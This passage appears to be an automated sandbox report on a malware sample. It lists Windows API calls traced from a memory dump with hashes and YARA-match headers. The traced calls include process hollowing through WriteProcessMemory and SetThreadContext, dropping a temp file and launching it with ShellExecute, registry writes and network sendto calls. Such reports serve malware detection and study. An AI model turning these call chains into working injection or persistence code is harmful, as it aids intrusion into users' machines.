                                                                                        • Instruction ID: 769a048f685401a256a85eff76778cd8c88f1a64718ff55e595c687d1e6f1928
                                                                                        • Opcode Fuzzy Hash: 1f315daeed99df34d4a3a8eefa1e4ccd68eb441fbd8969630f424e4830aea1b5
                                                                                        • Instruction Fuzzy Hash: EF510775A0230AEFCB15DFA4CD40B9EBBE9AF48344F084055EA01EBA51D770E945CFA0
                                                                                        APIs
                                                                                        • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,75918A60,?,?,?,?,030F9A60,?,?,030F9E9D), ref: 030F6A7D
                                                                                        • GetDiskFreeSpaceA.KERNEL32(030F9E9D,030F9A60,?,?,?,031022F8,?,?,?,030F9A60,?,?,030F9E9D), ref: 030F6ABB
                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,030F9A60,?,?,030F9E9D), ref: 030F6B40
                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,030F9A60,?,?,030F9E9D), ref: 030F6B4E
                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,030F9A60,?,?,030F9E9D), ref: 030F6B5F
                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,030F9A60,?,?,030F9E9D), ref: 030F6B6F
                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,030F9A60,?,?,030F9E9D), ref: 030F6B7D
                                                                                        • DeleteFileA.KERNEL32(?,?,?,?,?,?,?,?,030F9A60,?,?,030F9E9D), ref: 030F6B80
                                                                                        • GetLastError.KERNEL32(?,?,?,030F9A60,?,?,030F9E9D,?,?,?,?,?,030F9E9D,?,00000022,?), ref: 030F6B96
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseErrorHandleLast$File$CreateDeleteDiskFreeSpace
                                                                                        • String ID:
                                                                                        • API String ID: 3188212458-0
                                                                                        • Opcode ID: 96e93f9106d965a013baf42a09c0776fdd4655c6980073fbdfb16ff985a8627b
                                                                                        • Instruction ID: 31ceaaa1b4c9aa8ac3c20e20550c598e7d35141d37ad9eb0253e8a50b21187de
                                                                                        • Opcode Fuzzy Hash: 96e93f9106d965a013baf42a09c0776fdd4655c6980073fbdfb16ff985a8627b
                                                                                        • Instruction Fuzzy Hash: 4E31F2B690224DBFCB05EFA0CD44ADFBBB9EB8D304F084566E311A7604D77189858BA1
                                                                                        APIs
                                                                                        • GetUserNameA.ADVAPI32(?,030FD7C3), ref: 030F6F7A
                                                                                        • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,030FD7C3), ref: 030F6FC1
                                                                                        • ConvertSidToStringSidA.ADVAPI32(?,00000120), ref: 030F6FE8
                                                                                        • LocalFree.KERNEL32(00000120), ref: 030F701F
                                                                                        • wsprintfA.USER32 ref: 030F7036
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Name$AccountConvertFreeLocalLookupStringUserwsprintf
                                                                                        • String ID: /%d$|
                                                                                        • API String ID: 676856371-4124749705
                                                                                        • Opcode ID: 5ed46c992464c812da931850df52018f19c66fa54ae4d90312fdf38fa3126684
                                                                                        • Instruction ID: 7b37edd91db70f0f2ec0a59be0e28e717eedf1602e452044fd82e42c5bc8f968
                                                                                        • Opcode Fuzzy Hash: 5ed46c992464c812da931850df52018f19c66fa54ae4d90312fdf38fa3126684
                                                                                        • Instruction Fuzzy Hash: 2F311876900209EFDB01DFA8D848BDE7BBCEF08254F048166FA19DB505EA75D608CBA4
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(kernel32,GetSystemWow64DirectoryA,031022F8,000000E4,030F6DDC,000000C8), ref: 030F6CE7
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 030F6CEE
                                                                                        • GetSystemDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104), ref: 030F6D14
                                                                                        • GetWindowsDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104,?,00000000), ref: 030F6D2B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Directory$AddressHandleModuleProcSystemWindows
                                                                                        • String ID: C:\Windows\SysWOW64\$GetSystemWow64DirectoryA$kernel32
                                                                                        • API String ID: 1082366364-3395550214
                                                                                        • Opcode ID: 0dd942aec7cd1beeff51d31fe5ed956e8ccc3bbff66c3c302f8cc4239ff3f677
                                                                                        • Instruction ID: c43e90c34f75d57f6c9ef670867c4f96f85c9132967204dec9b10d47eb48bf49
                                                                                        • Opcode Fuzzy Hash: 0dd942aec7cd1beeff51d31fe5ed956e8ccc3bbff66c3c302f8cc4239ff3f677
                                                                                        • Instruction Fuzzy Hash: DE21DA65A823487EF765E6219CCCFBB6E8D8F4E649F0C0444F6047A485CBEA84C682B5
                                                                                        APIs
                                                                                        • CreateProcessA.KERNEL32(00000000,030F9947,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,?,031022F8), ref: 030F97B1
                                                                                        • GetThreadContext.KERNEL32(?,?,?,?,?,?,?,031022F8), ref: 030F97EB
                                                                                        • TerminateProcess.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,031022F8), ref: 030F97F9
                                                                                        • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,?,?,?,?,?,?,?,?,031022F8), ref: 030F9831
                                                                                        • SetThreadContext.KERNEL32(?,00010002,?,?,?,?,?,?,?,?,?,031022F8), ref: 030F984E
                                                                                        • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,031022F8), ref: 030F985B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ProcessThread$Context$CreateMemoryResumeTerminateWrite
                                                                                        • String ID: D
                                                                                        • API String ID: 2981417381-2746444292
                                                                                        • Opcode ID: b91a2ef0b3e19d6b3582bde094d2274072d8592724424d6f77fcbed54c311dd6
                                                                                        • Instruction ID: ea0f4cb7d4b86629cf821dc50d060b9a37b2566ce0ae29a826d07bee3d6cdfec
                                                                                        • Opcode Fuzzy Hash: b91a2ef0b3e19d6b3582bde094d2274072d8592724424d6f77fcbed54c311dd6
                                                                                        • Instruction Fuzzy Hash: 34212AB1D02219AFDB61EFA1DC49FEFBBBCEF0C654F040060BA19E5054EB719644CAA0
                                                                                        APIs
                                                                                          • Part of subcall function 030FDD05: GetTickCount.KERNEL32 ref: 030FDD0F
                                                                                          • Part of subcall function 030FDD05: InterlockedExchange.KERNEL32(031036B4,00000001), ref: 030FDD44
                                                                                          • Part of subcall function 030FDD05: GetCurrentThreadId.KERNEL32 ref: 030FDD53
                                                                                          • Part of subcall function 030FDD84: lstrcmpiA.KERNEL32(80000011,00000000), ref: 030FDDB5
                                                                                        • lstrcpynA.KERNEL32(?,030F1E84,00000010,localcfg,?,flags_upd,?,?,?,?,?,030FEAAA,?,?), ref: 030FE8DE
                                                                                        • lstrlenA.KERNEL32(?,localcfg,?,flags_upd,?,?,?,?,?,030FEAAA,?,?,00000001,?,030F1E84,?), ref: 030FE935
                                                                                        • lstrlenA.KERNEL32(00000001,?,?,?,?,?,030FEAAA,?,?,00000001,?,030F1E84,?,0000000A), ref: 030FE93D
                                                                                        • lstrlenA.KERNEL32(00000000,?,?,?,?,?,030FEAAA,?,?,00000001,?,030F1E84,?), ref: 030FE94F
                                                                                        Strings
                                                                                        Memory Dump Source
• Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
• API ID: lstrlen$CountCurrentExchangeInterlockedThreadTicklstrcmpilstrcpyn
• String ID: flags_upd$localcfg
• API String ID: 204374128-3505511081
• Opcode ID: 18e6b441e218d39aa0f551c2d5b179b2f74a7c6f76c5d84939bbdea2de1a4599
• Instruction ID: 8bf9f5558363860dba66119f499d2f1aafecf81ccf5fcb25d7087495ebcbb014
• Opcode Fuzzy Hash: 18e6b441e218d39aa0f551c2d5b179b2f74a7c6f76c5d84939bbdea2de1a4599
• Instruction Fuzzy Hash: F351417690120AEFCF01EFA8C984DEEB7F9FF48208F14456AE605A7610D775EA54CB60

Memory Dump Source
• Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
• API ID: Code
• API String ID: 3609698214-0
• Opcode ID: 732ba1998bb086e261bce17b6f31edcbbb69e708fd46492c0361d04be18e631d
• Instruction ID: 33d1e349bea4a01371ed34fa7944657e0245604b863644942793916e95795598
• Opcode Fuzzy Hash: 732ba1998bb086e261bce17b6f31edcbbb69e708fd46492c0361d04be18e631d
• Instruction Fuzzy Hash: 9F21D576102209FFDB14EB70EE48EAF7BACDB483A4B104915F742E1448EB72DA40D6B4

APIs
• GetTempPathA.KERNEL32(00000400,?,00000000,031022F8), ref: 030F907B
• wsprintfA.USER32 ref: 030F90E9
• CreateFileA.KERNEL32(031022F8,40000000,00000000,00000000,00000002,00000000,00000000), ref: 030F910E
• lstrlenA.KERNEL32(00000000,00000100,00000000), ref: 030F9122
• WriteFile.KERNEL32(00000000,00000000,00000000), ref: 030F912D
• CloseHandle.KERNEL32(00000000), ref: 030F9134
Memory Dump Source
• Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
• API ID: File$CloseCreateHandlePathTempWritelstrlenwsprintf
• API String ID: 2439722600-0
• Opcode ID: 0b655a71f99848aabe6df76a83ee46577068adae8e0771fc5bea657a6504efa1
• Instruction ID: 4975ed5983e458f7aaf140cd0b7af4c10a9c6eaadcd152f19ff680c646d4c087
• Opcode Fuzzy Hash: 0b655a71f99848aabe6df76a83ee46577068adae8e0771fc5bea657a6504efa1
• Instruction Fuzzy Hash: C811B7B66412147FF724B626DD09FEF366DDBCDB04F008065B70AA5094EAB44A4286B0

APIs
• GetTickCount.KERNEL32 ref: 030FDD0F
• GetCurrentThreadId.KERNEL32 ref: 030FDD20
• GetTickCount.KERNEL32 ref: 030FDD2E
• Sleep.KERNEL32(00000000,?,75920F10,?,00000000,030FE538,?,75920F10,?,00000000,?,030FA445), ref: 030FDD3B
• InterlockedExchange.KERNEL32(031036B4,00000001), ref: 030FDD44
• GetCurrentThreadId.KERNEL32 ref: 030FDD53
Memory Dump Source
• Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
• API ID: CountCurrentThreadTick$ExchangeInterlockedSleep
• API String ID: 3819781495-0
• Opcode ID: fcb57ea9f08debaa6c9a5c3b2f1238a751006d243757512581276fe24ef79872
• Instruction ID: d29219042fcf6d24c623e20543a9d8427c36a1a577ca0b39d4fd23a764feb95a
• Opcode Fuzzy Hash: fcb57ea9f08debaa6c9a5c3b2f1238a751006d243757512581276fe24ef79872
• Instruction Fuzzy Hash: 69F05E76106204DFD7C8FF65AA84B2D7BADEB4D39AF044816E609C264DCBB051C58E72

APIs
• gethostname.WS2_32(?,00000080), ref: 030FAD1C
• lstrlenA.KERNEL32(?), ref: 030FAD60
• lstrlenA.KERNEL32(?), ref: 030FAD69
• lstrcpyA.KERNEL32(?,LocalHost), ref: 030FAD7F
Memory Dump Source
• Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
• API ID: lstrlen$gethostnamelstrcpy
• String ID: LocalHost
• API String ID: 3695455745-3154191806
• Opcode ID: ca413be42b76f035d1199b93a61654ed44f752cc9da184425df01ab9d43cda57
• Instruction ID: 232eea2040386179fc70d4bc44b37a2cf7bc878bc5ae56cf96b77c5c1925aebd
• Opcode Fuzzy Hash: ca413be42b76f035d1199b93a61654ed44f752cc9da184425df01ab9d43cda57
• Instruction Fuzzy Hash: 60016D24A4618D5DDF75D628C444BF87FAE5F8F64AF080095DACA8B515DB6480838F72

APIs
• CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,030F98FD,00000001,00000100,031022F8,030FA3C7), ref: 030F4290
• CloseHandle.KERNEL32(030FA3C7), ref: 030F43AB
• CloseHandle.KERNEL32(00000001), ref: 030F43AE
Memory Dump Source
• Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
• API ID: CloseHandle$CreateEvent
• API String ID: 1371578007-0
• Opcode ID: cfee8009ee4d5511a8bae71be6b94b5aebfbf68b68b3dbf38b55841149767eb2
• Instruction ID: 11c2206659aa9020251e8b2c0d2a272bc5428de58f71c80ccd25786a45ed455a
• Opcode Fuzzy Hash: cfee8009ee4d5511a8bae71be6b94b5aebfbf68b68b3dbf38b55841149767eb2
• Instruction Fuzzy Hash: 07418CB5901209BEDB10EBA2CD85FEFBBBCEF84364F104555FB14A6580D7748641CBA0

APIs
• IsBadReadPtr.KERNEL32(?,00000014,00000000,?,00000000,?,030F64CF,00000000), ref: 030F609C
• LoadLibraryA.KERNEL32(?,?,030F64CF,00000000), ref: 030F60C3
• GetProcAddress.KERNEL32(?,00000014), ref: 030F614A
• IsBadReadPtr.KERNEL32(-000000DC,00000014), ref: 030F619E
Memory Dump Source
• Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
• API ID: Read$AddressLibraryLoadProc
• API String ID: 2438460464-0
• Opcode ID: 1af15b76a671ed8001150e7926a730cbdf292d750cdd3b920b6fab9523778324
• Instruction ID: b6e8b54c34e2a4147954430d7b89dd2ec3778479c098cc3a3475976cc087c44d
• Opcode Fuzzy Hash: 1af15b76a671ed8001150e7926a730cbdf292d750cdd3b920b6fab9523778324
• Instruction Fuzzy Hash: D2418F71A01209AFDB14EF58C884B6AB7F9FF44354F1C8468EA55D7691D732E940CB90

Memory Dump Source
• Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
• Opcode ID: 44ea4e701660c04141f41a4df0ecd9896ae83ec4699f33179c6657f50e14f4d6
• Instruction ID: 3bcb7dc9c6e3f3a7a5fd207fbfac74499ada268c0b71303b8977caab1ba27767
• Opcode Fuzzy Hash: 44ea4e701660c04141f41a4df0ecd9896ae83ec4699f33179c6657f50e14f4d6
• Instruction Fuzzy Hash: B3319F79A01308AFCB10DFA5CC81BFEB7F8EF48705F144856E604EB645E274D6418B60

APIs
• GetTickCount.KERNEL32 ref: 030F272E
• htons.WS2_32(00000001), ref: 030F2752
• htons.WS2_32(0000000F), ref: 030F27D5
• htons.WS2_32(00000001), ref: 030F27E3
• sendto.WS2_32(?,03102BF8,00000009,00000000,00000010,00000010), ref: 030F2802
  • Part of subcall function 030FEBCC: GetProcessHeap.KERNEL32(00000000,00000000,80000001,030FEBFE,7FFF0001,?,030FDB55,7FFF0001), ref: 030FEBD3
  • Part of subcall function 030FEBCC: RtlAllocateHeap.NTDLL(00000000,?,030FDB55,7FFF0001), ref: 030FEBDA
Memory Dump Source
• Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
• API ID: htons$Heap$AllocateCountProcessTicksendto
• API String ID: 1128258776-0
• Opcode ID: 79236b85ceb3108df1819d02dfbca7afe6d1efab76e01ebc7c50631f91f77666
• Instruction ID: b0010c2e29ed58b2c4145ae41a89fe7927ab3aca83ebb793af520c472c50597b
• Opcode Fuzzy Hash: 79236b85ceb3108df1819d02dfbca7afe6d1efab76e01ebc7c50631f91f77666
• Instruction Fuzzy Hash: BD3144382423829FD758EF74D884E6677B8EF5D31CB1988ADD9558B712D2B394C2CB20

APIs
• GetModuleHandleA.KERNEL32(00000000,?,00000104,00000100,031022F8), ref: 030F915F
• GetModuleFileNameA.KERNEL32(00000000), ref: 030F9166
• CharToOemA.USER32(?,?), ref: 030F9174
• wsprintfA.USER32 ref: 030F91A9
  • Part of subcall function 030F9064: GetTempPathA.KERNEL32(00000400,?,00000000,031022F8), ref: 030F907B
  • Part of subcall function 030F9064: wsprintfA.USER32 ref: 030F90E9
  • Part of subcall function 030F9064: CreateFileA.KERNEL32(031022F8,40000000,00000000,00000000,00000002,00000000,00000000), ref: 030F910E
  • Part of subcall function 030F9064: lstrlenA.KERNEL32(00000000,00000100,00000000), ref: 030F9122
  • Part of subcall function 030F9064: WriteFile.KERNEL32(00000000,00000000,00000000), ref: 030F912D
  • Part of subcall function 030F9064: CloseHandle.KERNEL32(00000000), ref: 030F9134
• ShellExecuteA.SHELL32(00000000,00000000,?,00000000,00000000,00000000), ref: 030F91E1
Memory Dump Source
• Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
• API ID: File$HandleModulewsprintf$CharCloseCreateExecuteNamePathShellTempWritelstrlen
• API String ID: 3857584221-0
• Opcode ID: 101fce587a8fe633dcf44386605b725e9d6318bc4ec02a4661b55cadc4f7106f
• Instruction ID: 7c944463cba17cb92e70b0581d2b5ee493f69c3218012fef4daf2bf704fa69f4
• Opcode Fuzzy Hash: 101fce587a8fe633dcf44386605b725e9d6318bc4ec02a4661b55cadc4f7106f
• Instruction Fuzzy Hash: 05012DB69002587BD660B661DD49FDF767C9B8DB05F0000A1B749E6084DAB496C58F71

APIs
• lstrlenA.KERNEL32(?,localcfg,?,00000000,?,?,030F2491,?,?,?,030FE844,-00000030,?,?,?,00000001), ref: 030F2429
• lstrlenA.KERNEL32(?,?,030F2491,?,?,?,030FE844,-00000030,?,?,?,00000001,030F1E3D,00000001,localcfg,lid_file_upd), ref: 030F243E
• lstrcmpiA.KERNEL32(?,?), ref: 030F2452
• lstrlenA.KERNEL32(?,?,030F2491,?,?,?,030FE844,-00000030,?,?,?,00000001,030F1E3D,00000001,localcfg,lid_file_upd), ref: 030F2467
Memory Dump Source
• Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
• API ID: lstrlen$lstrcmpi
• String ID: localcfg
• API String ID: 1808961391-1857712256
• Opcode ID: f4d140e5bb0f57154e9c6784038208dd3443c832d4957010a54636f0663aadcf
• Instruction ID: 2e59eb7f6f9a9534cd243cb68ff82ee7187c5757876869dfa19d933c649a3269
• Opcode Fuzzy Hash: f4d140e5bb0f57154e9c6784038208dd3443c832d4957010a54636f0663aadcf
• Instruction Fuzzy Hash: 62011A35601618AFCF11EF69CC808DEBBADEF45394B05C825E95997A00E3B0EA408A90

Memory Dump Source
• Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
• API ID: wsprintf
• String ID: %u.%u.%u.%u.%s$localcfg
• API String ID: 2111968516-120809033
• Opcode ID: 9126ad6ef7c08ad71aa105feb62d5517414366ecb08633fa43ea183f727e1a8b
• Instruction ID: 3192a4a294e56dc77febc311df09c9bbc3a32fdff2fd2a0763f1c40efb587544
• Opcode Fuzzy Hash: 9126ad6ef7c08ad71aa105feb62d5517414366ecb08633fa43ea183f727e1a8b
• Instruction Fuzzy Hash: 13419A769052989FDB25DFB88C44BEE7BFCAF4D210F280056FAA4D7152D634DA04CBA0

APIs
  • Part of subcall function 030FDD05: GetTickCount.KERNEL32 ref: 030FDD0F
  • Part of subcall function 030FDD05: InterlockedExchange.KERNEL32(031036B4,00000001), ref: 030FDD44
  • Part of subcall function 030FDD05: GetCurrentThreadId.KERNEL32 ref: 030FDD53
• lstrcmpA.KERNEL32(75920F18,00000000,?,75920F10,00000000,?,030F5EC1), ref: 030FE693
• lstrcpynA.KERNEL32(00000008,00000000,0000000F,?,75920F10,00000000,?,030F5EC1), ref: 030FE6E9
• lstrcmpA.KERNEL32(89ABCDEF,00000008,?,75920F10,00000000,?,030F5EC1), ref: 030FE722
Memory Dump Source
• Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
• API ID: lstrcmp$CountCurrentExchangeInterlockedThreadTicklstrcpyn
• String ID: 89ABCDEF
• API String ID: 3343386518-71641322
• Opcode ID: 1330356a4b7a35f7f18c530a445690df8f999971abdb621cb06ea7550addfd9c
• Instruction ID: f609286d2b07b053a615694453554235b21b62b98e84f8e5af4c889292d14fd4
• Opcode Fuzzy Hash: 1330356a4b7a35f7f18c530a445690df8f999971abdb621cb06ea7550addfd9c
• Instruction Fuzzy Hash: 2A31E431602709DFCF35CF24D88875B77E8AF08754F18486AE6458B9A4E7B0E880CB51

APIs
• RegCreateKeyExA.ADVAPI32(80000001,030FE2A3,00000000,00000000,00000000,00020106,00000000,030FE2A3,00000000,000000E4), ref: 030FE0B2
• RegSetValueExA.ADVAPI32(030FE2A3,?,00000000,00000003,80000001,000FF000,?,?,?,?,000000C8,031022F8), ref: 030FE127
• RegDeleteValueA.ADVAPI32(030FE2A3,?,?,?,?,?,000000C8,031022F8), ref: 030FE158
• RegCloseKey.ADVAPI32(030FE2A3,?,?,?,?,000000C8,031022F8,?,?,?,?,?,?,?,?,030FE2A3), ref: 030FE161
Memory Dump Source
• Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
• API ID: Value$CloseCreateDelete
• API String ID: 2667537340-0
• Opcode ID: 820e9afd4342fe534fa4adfa93e359aa9a9609dbdbcf6660a9c31a011f60ab10
• Instruction ID: 4e8425ab0fd585e4451ce87a1a93b9c317957bf0db24f9e5f2c233b1a18141d5
• Opcode Fuzzy Hash: 820e9afd4342fe534fa4adfa93e359aa9a9609dbdbcf6660a9c31a011f60ab10
• Instruction Fuzzy Hash: 89216471A0121DBFDF20EEA9DC89EDE7FB9EF09754F044061FA04E6164E6718A54C7A0

APIs
• WriteFile.KERNEL32(00000000,00000000,030FA3C7,00000000,00000000,000007D0,00000001), ref: 030F3F44
• GetLastError.KERNEL32 ref: 030F3F4E
• WaitForSingleObject.KERNEL32(00000004,?), ref: 030F3F5F
• GetOverlappedResult.KERNEL32(00000000,00000000,00000000,00000000), ref: 030F3F72
Memory Dump Source
• Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
• API ID: ErrorFileLastObjectOverlappedResultSingleWaitWrite
• API String ID: 3373104450-0
• Opcode ID: 26e44ef13c0799d76d495db90164b055210f7b078270fd8f6ac5b979f7ee57d4
• Instruction ID: 1a744ceb30c0eb8503b78fb0515859860fa68e6b9dbac55c88712de95f16b8e7
• Opcode Fuzzy Hash: 26e44ef13c0799d76d495db90164b055210f7b078270fd8f6ac5b979f7ee57d4
• Instruction Fuzzy Hash: A901A572515209AFDF15EF90DD84BEF7BBCEB082A5F1044A5FA01E2044D770DA558BB2

APIs
• ReadFile.KERNEL32(00000000,00000000,030FA3C7,00000000,00000000,000007D0,00000001), ref: 030F3FB8
• GetLastError.KERNEL32 ref: 030F3FC2
• WaitForSingleObject.KERNEL32(00000004,?), ref: 030F3FD3
• GetOverlappedResult.KERNEL32(00000000,00000000,00000000,00000000), ref: 030F3FE6
Memory Dump Source
• Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        • API ID: ErrorFileLastObjectOverlappedReadResultSingleWait
                                                                                        • String ID:
                                                                                        • API String ID: 888215731-0
                                                                                        • Opcode ID: 800981ccccb39b6e6bc8b79a423ea8d1416c69a56def0e2fc515882093a72efe
                                                                                        • Instruction ID: 7c808d2567351eee9fcf2fc1490b504a973000a62c9faac9551191d4ee6b2b08
                                                                                        • Opcode Fuzzy Hash: 800981ccccb39b6e6bc8b79a423ea8d1416c69a56def0e2fc515882093a72efe
                                                                                        • Instruction Fuzzy Hash: 5401A97251120AAFDF11EFA4D945BEE7BBCEB08265F104591FA02E2054D770DA548BB1
                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 030F4BDD
                                                                                        • GetTickCount.KERNEL32 ref: 030F4BEC
                                                                                        • Sleep.KERNEL32(00000000,?,?,?,0341B114,030F50F2), ref: 030F4BF9
                                                                                        • InterlockedExchange.KERNEL32(0341B108,00000001), ref: 030F4C02
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountTick$ExchangeInterlockedSleep
                                                                                        • String ID:
                                                                                        • API String ID: 2207858713-0
                                                                                        • Opcode ID: 91af060c687b1c723926bc72ee08b8dd675411af5a59132fd095f7bed600200d
                                                                                        • Instruction ID: fc22f5855fc3b7a2cbf66feb4f95024ca985802dceeb0ebf93ce651ef55de0e3
                                                                                        • Opcode Fuzzy Hash: 91af060c687b1c723926bc72ee08b8dd675411af5a59132fd095f7bed600200d
                                                                                        • Instruction Fuzzy Hash: 0DE0CD332422145BD71076FB5D84F9B779CDB4D3B6F060572FF08D2549D5D6948141B1
                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 030F4E9E
                                                                                        • GetTickCount.KERNEL32 ref: 030F4EAD
                                                                                        • Sleep.KERNEL32(0000000A,?,00000001), ref: 030F4EBA
                                                                                        • InterlockedExchange.KERNEL32(?,00000001), ref: 030F4EC3
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountTick$ExchangeInterlockedSleep
                                                                                        • String ID:
                                                                                        • API String ID: 2207858713-0
                                                                                        • Opcode ID: 77edf05be7702111e74a06715dbafb1ece205cc158daaf9a7474d6c7ede77af0
                                                                                        • Instruction ID: 1469fbe465f961628d601e6a8de03cb868f94e12aa7d26360e03fdd3cc2b29a4
                                                                                        • Opcode Fuzzy Hash: 77edf05be7702111e74a06715dbafb1ece205cc158daaf9a7474d6c7ede77af0
                                                                                        • Instruction Fuzzy Hash: 5BE086322022145BD71076BAAD84F5B768D9B4E2A9F050571EB09D2148C696948245B1
                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 030FA4D1
                                                                                        • GetTickCount.KERNEL32 ref: 030FA4E4
                                                                                        • Sleep.KERNEL32(00000000,?,030FC2E9,030FC4E0,00000000,localcfg,?,030FC4E0,03103588,030F8810), ref: 030FA4F1
                                                                                        • InterlockedExchange.KERNEL32(?,00000001), ref: 030FA4FA
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountTick$ExchangeInterlockedSleep
                                                                                        • String ID:
                                                                                        • API String ID: 2207858713-0
                                                                                        • Opcode ID: 9103f594589096b1578dd348926ac6239db61159c3a6347d2df0d32941a32d62
                                                                                        • Instruction ID: 764020580a6d88ab59d5701c72df8870de303455a123f76c4f31c0e7de7abb7c
                                                                                        • Opcode Fuzzy Hash: 9103f594589096b1578dd348926ac6239db61159c3a6347d2df0d32941a32d62
                                                                                        • Instruction Fuzzy Hash: 6AE026333022055FC600ABA5AD84F6A3398AB8D6A1F050061FB08D3548C696A48149B6
                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 030F3103
                                                                                        • GetTickCount.KERNEL32 ref: 030F310F
                                                                                        • Sleep.KERNEL32(00000000), ref: 030F311C
                                                                                        • InterlockedExchange.KERNEL32(?,00000001), ref: 030F3128
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountTick$ExchangeInterlockedSleep
                                                                                        • String ID:
                                                                                        • API String ID: 2207858713-0
                                                                                        • Opcode ID: aae22e717a039c82888ef879685f3cca7c6b385c7d9af91e744668f14a024054
                                                                                        • Instruction ID: 38d784167d0b1be355f37a50d79986a7215d481484ed6be4a1192831b667a759
                                                                                        • Opcode Fuzzy Hash: aae22e717a039c82888ef879685f3cca7c6b385c7d9af91e744668f14a024054
                                                                                        • Instruction Fuzzy Hash: E5E0C239201215AFDB00BB79AE44B4A6A9EEF8C7B5F0104B5F301D2598C69088808971
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountTick
                                                                                        • String ID: localcfg
                                                                                        • API String ID: 536389180-1857712256
                                                                                        • Opcode ID: 2d8ed16fcd44915d8f9224a1a0be733b5163984e5a3ad19b5e89b428712a7df4
                                                                                        • Instruction ID: f44adc0f2dcf60bd2f10e75e0b7b3d4aac4bc391b5cb7aea298d23a79da25134
